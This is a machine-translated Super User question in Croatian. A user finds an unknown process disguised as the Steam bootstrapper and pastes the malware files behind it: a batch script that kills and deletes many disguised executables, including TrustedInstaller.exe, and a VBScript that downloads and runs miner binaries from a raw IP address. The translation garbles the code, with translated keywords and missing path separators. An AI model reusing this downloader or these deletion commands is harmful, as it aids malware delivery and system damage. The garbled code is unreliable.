prozori - Kako trajno uništiti pokretačicu parnog klijenta - Super User
U upravitelju zadataka imam sljedeću situaciju:
Ne znam kakva je to aplikacija, ali definitivno nisam Steam klijent bootstrapper jer ga nisam instalirao i ne mogu ga deinstalirati.
Ako pokušam shvatiti koja je vrsta aplikacije putem ovog koraka:
Vidim nešto ovako:
U uslužnom programu MS Config nisam našao ništa što izgleda kao secury.exe.
Kada otvorim lokaciju datoteke, vidim tri datoteke:
m.bat, b.exe, 4.vbs.
U nastavku slijedi sadržaj m.bat:
taskkill / f / t / im secury.exe c: ProgramData secury.exe taskkill / f / t / im kingsoft.exe taskkill / f / t / im expl0rer.exe taskkill / f / t / im ieplare.exev taskkill / f / t / im nssm.exe taskkill / f / t / im MSASCui.exe taskkill / f / t / im SystemSettlngs.exe taskkill / f / t / im SystemSetting.exe taskkill / f / t / im Procesni zadatak / / f / t / im winlnlt.exe taskkill / f / t / im WindowsUpgrade.exe taskkill / f / t / im msdc.exe taskkill / f / t / im Fiddlere.exe taskkill / f / t / im shovst.exe taskkill / f / t / im lqrtqe.exe taskkill / f / t / im apkls.exe taskkill / f / t / im winlog.exe taskkill / f / t / im svchosts.exe taskkill / f / t / im win1ogins.exe taskkill / f / t / im shovsts.exe taskkill / f / t / im fcty.exe taskkill / f / t / im so.os.exe taskkill / f / t / im TrustedInstaller.exe del C: Windows System32 \ t C: Windows Postavljanje TrustedInstaller.exe del C: ProgramData kingsoft.exe del C: Programski podaci expl0rer.exe del C: ProgramData ieplare.exe del C: ProgramData nssm.exe del C: Programski podaci MSASCui.exe del C: Pro ProgramData SystemSetting.exe del C: ProgramData Process.exe del C: ProgramData winlnlt.exe del C: ProgramData WindowsUpgrade.exe del C: ProgramData msdc.exe C: ProgramData Fiddlere.exe del C: ProgramData shovst.exe del C: ProgramData lqrtqe.exe del C: ProgramData apkls.exe del C: ProgramData winlog.exe del C: ProgramData svchosts.exe del C: ProgramData win1ogins.exe del C: ProgramData shovsts.exe del C: ProgramData fcty.exe del C: ProgramData pool.exe del C: ProgramData pool2.exe del C: \ ProgramData \ pool3.exe
Sljedeće ide 4.vbs:
Postavi xPost = CreateObject ("Microsoft.XMLHTTP") xPost.Otvori "GET", "http://223.68.209.7:65510/2.exe", 0 xPost.Send () Postavi sGet = CreateObject ("ADODB.Stream") ) sGet.Mode = 3 sGet.Type = 1 sGet.Open () sGet.Write (xPost.responseBody) sGet.SaveToFile "c: ProgramData s2.exe", 2 Postavi xPost = CreateObject ("Microsoft.XMLHTTP") xPost.Otvori "GET", "http://223.68.209.7:65510/pool.exe", 0 xPost.Send () Postavi sGet = CreateObject ("ADODB.Stream") sGet.Mode = 3 sGet.Type = 1 sGet.Open () sGet.Write (xPost.responseBody) sGet.SaveToFile "c: ProgramData pool2.exe", 2 CreateObject ("WScript.Shell"). Pokreni "C: ProgramData \ t "WScript.Shell"). Pokreni "del C: ProgramData: pool3.exe"
Što mogu učiniti kako bi se spriječilo da secury.exe zloupotrebljava računalne moći mog poslužitelja?
PS Ja sam izvršio Avast punu provjeru mog računala, ali nije našao ništa pogrešno.
Exe zloupotrebljava računalne moći mog poslužitelja?